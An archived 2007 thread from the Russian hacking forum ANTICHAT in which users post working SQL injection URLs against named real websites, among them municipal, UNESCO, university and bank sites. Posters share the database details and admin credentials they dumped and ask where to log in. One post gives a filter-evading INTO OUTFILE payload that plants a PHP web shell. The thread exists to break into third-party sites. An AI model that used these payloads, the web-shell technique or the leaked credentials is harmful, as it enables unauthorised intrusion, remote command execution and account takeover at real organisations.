ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.11.2007, 15:58
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
Муниципальные образования Приморского края
Код:
http://www.mo.primorsky.ru/kirovsky/view.php?id=-1+union+select+1/*
www.mxd.ru
Код:
http://www.mxd.ru/projects/design/view.php?id=-1+union+select+1,database(),3,4,user(),6,7,pass,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23+from+user/*
Пароль админа: root
правда логин не знаю , и куда все эт сувать 
mxd@62.205.161.7
4.0.27-log
http://women.unesco.kz
Код:
http://women.unesco.kz/view.php?id=-1+union+select+concat(login,0x3a,pwd),2,3,4,5,6+from+users+limit+1/*
XaHyMaH : aurora
не нашел где залогиниться =(
http://www.patkirk.com
Код:
http://www.patkirk.com/make.php?id=-1+union+select+user(),database(),version(),4,5,6,7+INFORMATION_SCHEMA/*
web18-patkirk1@localhost
web18-patkirk1
5.0.45-community
дальше ни че не смог сделать. есил что то получится у вас, отпишитесь плз.
Код:
http://www.age.fr/fr/module.php?ID=-1+order+by+11/*
После долгих мучений, я в плюсе!!! 
Последний раз редактировалось Mike 007; 26.11.2007 в 16:49..
|
|
|
26.11.2007, 16:54
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
http://portsmon.freebsd.org/
http://portsmon.freebsd.org/portoverview.py?category=&portname=gkrellsun'+UniO n+selEct+concat(version(),':',user()),2,3,4/*&wildcard=yes
5.0.45_:_portsmon_u@localhost
http://portsmon.freebsd.org/portoverview.py?category=&portname=gkrellsun'+UniO n+selEct+concat(table_name,':',column_name),2,3,4+ from+information_schema.columns/*&wildcard=yes
таблиц много, но как и следовало ожидать /для меня/ не чего интересного
|
|
|
|
26.11.2007, 18:03
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
Италия
Код:
http://www.megalab.it/articoli.php?id=220&pagina=-2+union+select+concat_ws(char(58),user(),version(),database())/*
megalabdb@localhost:5.0.37-log:megalab
Код:
http://www.aduc.it/dyn/comunicati/comu_mostra.php?id=999999999999999+union+select+1,2,concat_ws(char(58),user(),version(),database()),4/*
aduc@localhost:5.0.26:aducdb
Код:
http://www.sodalitas.it/news.php?ID=-222+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46/*
sod78as68@localhost:4.1.20:Sql945as
Код:
http://www.corvorosso.it/pagine/articoli.php?id=-1021+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
corvo29@web2-rodonet.rodonet.it:5.0.24a-Debian_9ubuntu2-log:corvo
Код:
http://www.ghislieri.it/pagina.php?id=-104+union+select+1,2,3,4,5,6,7,8/*
rettorato@localhost:5.0.27-log:rettorato
|
|
|
|
26.11.2007, 18:37
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
http://www.onboard.ru
Код:
http://www.onboard.ru/resort/?id=-1+union+select+user()/*
|
|
|
|
26.11.2007, 19:49
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
Италия
Код:
http://www.millenniumcampaign.it/standup/newsDett.php?id=-36+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5/*
ML2693_usoft@81.88.49.2:4.1.22-standard-log:millenniumcampaign_it_standup2007
edu
Код:
http://blogsforlearning.msu.edu/articles/view.php?id=-6+union+select+1,2,3,4,5,6,7,8,9/*
|
|
|
|
26.11.2007, 19:56
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
ОАО «Белвнешэкономбанк»
Код:
http://www.bveb.by/news/index.php?ItemNumber=-1+union+select+1,2,3,4,5,6,7,8,9,1,2/*
Кому интересно, копайте дальше... (:
|
|
|
|
26.11.2007, 20:19
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
Сообщение от Iceangel_
вот по сути запрос заливки шелла в вашем случае...
Код:
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,'<?php system($_GET[cmd]); ?>',9,10,11,12+from+into+outfile+'/здесь путь.../cmd.php'/*
так будет выглядить запрос для обхода фильтрации
Код:
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,CHAR(39, 60, 63, 112, 104, 112, 32, 115, 121, 115, 116, 101, 109, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 32, 63, 62, 39),9,10,11,12+from+into+outfile+CHAR(39, 47, 1079, 1076, 1077, 1089, 1100, 32, 1087, 1091, 1090, 1100, 46, 46, 46, 47, 99, 109, 100, 46, 112, 104, 112, 39)/*
P.S существует удобный плагин для таких дел HackBar (Firefox)... нифига не получается! пробую просто на локальном компе, вообще для другой базы. На простейшем примере.
Вот так пишет в файл:
Код:
SELECT description
FROM films
WHERE fid =5 into outfile '123654.txt'
а вот так выдает ошипку:
Код:
SELECT description
FROM films
WHERE fid =5 into outfile char(49,50,51,54,53,52,46,116,120,116)
и так тоже не пашет: (типа имя файла в кавычки взял:
Код:
SELECT description
FROM films
WHERE fid =5 into outfile char(39,49,50,51,54,53,52,46,116,120,116,39)
Выходит, что нельзя писать в файл если кавычечги фильтруются?
|
|
|
|
26.11.2007, 21:56
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
код:
http://inbox.net.ua/index.php?id=900&show=news&newsid=-3462+union+select+1,table_name,3+from+information_ schema.tables+limit+992,1/*
большая бд,стоит фильтрация на скобки
__________________________________________
достаточно большой сайт 
код:
http://www.femina.com.ua/cgi-bin/board.cgi?page=694&zrazdel=-3+union+select+1,concat(username,0x3a,user_passwor d)+from+phpbb_users+limit+1,1/*&pages=1046
5 версия мускула,много таблиц
админ на форуме admin:atvbyf
__________________________________________
тоже не маленький сайт 
код:
http://wantbaby.info/guide/glossary/?Term=-5+union+select+1,concat(table_schema,0x3a,table_na me,0x3a,column_name),3,4,5,6,7,8,9+from+informatio n_schema.columns/*
вывод-"все сразу" |
|
|
|
26.11.2007, 22:07
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
www.strawtec.com.au
Код:
http://www.strawtec.com.au/content.php?id=<sql-inj>
4.1.12a-nt-max:strawtec@localhost:strawbale
Код:
strawtecadmin:snowfall88
strawtec:Phil Egan
brett:trustno1
|
|
|
|
26.11.2007, 22:20
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
Официальный сайт хоккейного клуба «Рязань»
Код:
http://hcryazan.ru/about_user.php?id=-1+union+select+1,concat_ws(0x3a,name,pass,mail,icq),3,mail,icq,pass,6,7,8,9+from+users/*
Эт база всех юзеров - ник пароль мыло ася
Admin : secret : admin@hc-rzn.org.ru : 399828412
помогите найти, куда пароль вводить для админа.
З.Ы: если кто за них болеет, не обижайтесь
Код:
http://www.shadowknights.ru/index.php?id=-1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13/*
Последний раз редактировалось Mike 007; 26.11.2007 в 22:35..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
